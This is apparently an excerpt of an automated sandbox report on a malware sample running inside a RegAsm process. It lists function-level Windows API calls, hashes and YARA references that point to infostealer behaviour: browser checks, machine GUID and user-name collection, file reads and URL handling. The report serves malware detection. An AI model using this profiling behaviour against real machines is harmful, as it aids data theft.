                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Internet$File$CloseHandle$OpenRead$CrackCreateWritelstrcpylstrlen
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 105467990-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 293ae950a71a35dd31170524bf55ad8f3fe1ba7934d9239bbdafcff3850940c6
                                                                                                                                                                                                                                                                                                  • Instruction ID: ad3e8e31fbd1234b42d1b8aa39bbe646f14909c43cf7d3cadb2e212234b9bc59
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 293ae950a71a35dd31170524bf55ad8f3fe1ba7934d9239bbdafcff3850940c6
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9E51C271910308ABEB10DBA0CC86FEF7779EB05714F504169F601B72C1DB78AA08CBA9
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 0040E920 Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 532COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,0156F748,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E980
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,0156F708,?,?,?,?,?,?,?,?,?,?,?,00000000,00421864,000000FF), ref: 0040EA05
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,0156F768,?,?,?,?,?,?,?,?,?,?,?,00000000,00421864,000000FF), ref: 0040EB2C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,0156F748), ref: 0040ECE0
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,0156F708), ref: 0040EDE3
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy
                                                                                                                                                                                                                                                                                                  • String ID: Stable\$ Stable\
                                                                                                                                                                                                                                                                                                  • API String ID: 3722407311-4033978473
                                                                                                                                                                                                                                                                                                  • Opcode ID: bda3692e277681d7335d2bab289e7abd920f7fe9e97857ff53baf51a78d4169f
                                                                                                                                                                                                                                                                                                  • Instruction ID: 797b0d2c89d37aa4bb5ea973c038b2c02b127ec3880a0442df269e7358998569
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bda3692e277681d7335d2bab289e7abd920f7fe9e97857ff53baf51a78d4169f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50325A74900348DFCB14DFA9C581ADEBBF5BF48304F10856EE94AA3791D774AA08CB95
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 0040E969 Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 507COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,0156F748,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E980
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,0156F708,?,?,?,?,?,?,?,?,?,?,?,00000000,00421864,000000FF), ref: 0040EA05
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,0156F768,?,?,?,?,?,?,?,?,?,?,?,00000000,00421864,000000FF), ref: 0040EB2C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE60: lstrcpy.KERNEL32(00000000), ref: 0040FE88
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,0156F748), ref: 0040ECE0
                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,0156F708), ref: 0040EDE3
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040E2F0: StrCmpCA.SHLWAPI(00000000,Opera GX,00426AD3,00426AD2,?,?), ref: 0040E34D
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy
                                                                                                                                                                                                                                                                                                  • String ID: Stable\$ Stable\
                                                                                                                                                                                                                                                                                                  • API String ID: 3722407311-4033978473
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1bdd02703c20214b720293815fe158cec6289543c52e2fa33b3ffe7d7f8e6d03
                                                                                                                                                                                                                                                                                                  • Instruction ID: 065ccd6fded3c9645b02dfe38afe88cf5481e2341bba9ab26d00f1f73bb39b14
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1bdd02703c20214b720293815fe158cec6289543c52e2fa33b3ffe7d7f8e6d03
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 86324A74900348DFCB24DFA9C581ADEBBF5BF48304F10856EE94AA3791D774AA08CB95
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00418490 Relevance: 10.6, APIs: 7, Instructions: 72sleepCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004185A0: LoadLibraryA.KERNEL32(kernel32.dll,004184AA), ref: 004185A5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004185A0: GetProcAddress.KERNEL32(00000000,0155F258), ref: 004185C0
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,0155F1C8), ref: 004185ED
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,0155F2E8), ref: 00418606
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,0155F3C0), ref: 0041861E
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,0155F3A8), ref: 00418636
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,01562EB0), ref: 0041864F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,015625C0), ref: 00418667
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,01562800), ref: 0041867F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,0155F360), ref: 00418698
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,0155F300), ref: 004186B0
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,0155F438), ref: 004186C8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,0155F240), ref: 004186E1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,015627E0), ref: 004186F9
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,0155F3F0), ref: 00418711
                                                                                                                                                                                                                                                                                                    • Part of subcall function 004185A0: GetProcAddress.KERNEL32(74DD0000,0155F318), ref: 0041872A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401050: strcmp.MSVCRT ref: 0040105C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401050: strcmp.MSVCRT ref: 00401075
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401050: ExitProcess.KERNEL32 ref: 00401082
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401090: CreateDCA.GDI32(01562F10,00000000,00000000,00000000), ref: 0040109D
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401090: GetDeviceCaps.GDI32(00000000,0000000A), ref: 004010A8
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401090: ReleaseDC.USER32(00000000,00000000), ref: 004010B1
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FE20: lstrcpy.KERNEL32(00000000,004184C1), ref: 0040FE49
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410220: GetProcessHeap.KERNEL32(00000000,00000104,?,01562F00,?,00401074,01562F00,?,004184AF), ref: 0041022C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410220: HeapAlloc.KERNEL32(00000000,?,01562F00,?,00401074,01562F00,?,004184AF), ref: 00410233
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00410220: GetUserNameA.ADVAPI32(00000000,01562F00), ref: 00410247
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrlen.KERNEL32(?,?,?,?,?,?,004218D9,000000FF,?,004184E7,?,01562F00,?), ref: 0041001C
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcpy.KERNEL32(00000000), ref: 00410047
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FFE0: lstrcat.KERNEL32(?,?), ref: 00410051
                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040FF00: lstrcpy.KERNEL32(00000000), ref: 0040FF40
                                                                                                                                                                                                                                                                                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01562F00,?,00427854,?,00000000,0042738B), ref: 00418526
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00418531
                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00001B58), ref: 0041853C
                                                                                                                                                                                                                                                                                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000), ref: 00418552
                                                                                                                                                                                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041856C
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041857A
                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00418582
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$EventProcesslstrcpy$CloseCreateExitHandleHeapOpenstrcmp$AllocCapsDeviceLibraryLoadNameReleaseSleepUserlstrcatlstrlen
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3108587868-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 35625142e2cec7fe4820e24ec2ea0dfab6378e1cacd4a495e410176c49d131cf
                                                                                                                                                                                                                                                                                                  • Instruction ID: 55b900fef8fb81f1d8c87853b9dcba1fdba1e1d9fc668c1e9ac9258d03b45c33
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 35625142e2cec7fe4820e24ec2ea0dfab6378e1cacd4a495e410176c49d131cf
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0A214F319001046ADB10F7F1ED56FEE7769AF15749F50017EB602B20E2EF782A44C6A9
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00404430 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 63stringnetworkCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT ref: 00404482
                                                                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT ref: 0040448F
                                                                                                                                                                                                                                                                                                  • ??_U@YAPAXI@Z.MSVCRT ref: 0040449C
                                                                                                                                                                                                                                                                                                  • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044B6
                                                                                                                                                                                                                                                                                                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 004044C6
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CrackInternetlstrlen
                                                                                                                                                                                                                                                                                                  • String ID: <
                                                                                                                                                                                                                                                                                                  • API String ID: 1274457161-4251816714
                                                                                                                                                                                                                                                                                                  • Opcode ID: c2d99635ee706aa264367abcfccdf2b6c1e7a110f32e3a303af79840e58cc652
                                                                                                                                                                                                                                                                                                  • Instruction ID: b34fd57166b640466ff53f1d7e025f9f2fa8d164da18c3b6a8d9ee5040319ab5
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c2d99635ee706aa264367abcfccdf2b6c1e7a110f32e3a303af79840e58cc652
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6A2190B1900308ABDB10DFA4D845BDE7BB8FB05724F10022AFA14A72C1DB785A45CB94
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00410C30 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42registryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 00410C55
                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,00000000), ref: 00410C72
                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(00000000,MachineGuid,00000000,00000000,00000000,000000FF), ref: 00410C94
                                                                                                                                                                                                                                                                                                  • CharToOemA.USER32(00000000,?), ref: 00410CB2
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CharOpenQueryValuememset
                                                                                                                                                                                                                                                                                                  • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                                                                                                                                                                                                                                                  • API String ID: 1728412123-1211650757
                                                                                                                                                                                                                                                                                                  • Opcode ID: d1a435782dd83d7f550c539121538bf67655ca91605d8f0b0f79fed1bf92e6ca
                                                                                                                                                                                                                                                                                                  • Instruction ID: 460f4ab23b8a3188437fc1a8912af36b6d87c49434b27b75157095bf63d9280c
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d1a435782dd83d7f550c539121538bf67655ca91605d8f0b0f79fed1bf92e6ca
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C501D87964421DFBDB24DB90DC46FDA777C9B14700F104195B648A21C1EAB46B848B54
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00410680 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39memoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,TimeZone: ,00000000,?,00427494,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00427480), ref: 0041068E
                                                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,TimeZone: ,00000000,?,00427494,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00427480,00000000), ref: 00410695
                                                                                                                                                                                                                                                                                                  • GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040), ref: 004106B5
                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 004106DB
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
                                                                                                                                                                                                                                                                                                  • String ID: %d MB$@
                                                                                                                                                                                                                                                                                                  • API String ID: 3644086013-3474575989
                                                                                                                                                                                                                                                                                                  • Opcode ID: 5dfca5893529c656c4b4a9b4f8761da4c616214f26f1a97dcc2b1de84db4f8d6
                                                                                                                                                                                                                                                                                                  • Instruction ID: aacdcdf272e837d99f9e88c087b3e125dfef2ba064554339201941a4c0c98342
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5dfca5893529c656c4b4a9b4f8761da4c616214f26f1a97dcc2b1de84db4f8d6
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6AF09671A50228ABE7049BE4DD0AFBE776DEB05701F400119FB06E3280D7B49C5187A9
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00406E80 Relevance: 9.1, APIs: 6, Instructions: 80filememoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000), ref: 00406EB7
                                                                                                                                                                                                                                                                                                  • GetFileSizeEx.KERNEL32(00000000,?,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406ECD
                                                                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,?,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406EE8
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,?,00000002,00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F01
                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F21
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000002,?,0040C95D,?,00000000,?,00000000,?,00000000), ref: 00406F29
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.2066368536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000511000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000514000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.0000000000558000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.00000000005F1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000005.00000002.2066368536.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2311089104-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: caa0b5450c5094a5baae45dd89f1c39122fbd366014749046abec390aabaa39d
                                                                                                                                                                                                                                                                                                  • Instruction ID: c4e30b9aeb20b9eebc150f857a21994ff691bd194d11d8d74cc69b1be826a0c7
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: caa0b5450c5094a5baae45dd89f1c39122fbd366014749046abec390aabaa39d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4A217C71A0121AAFDB10DFA4EC84FAB7B79EB45754F10023AF912A72C0D7389D11CBA4
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 00407280 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 119libraryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
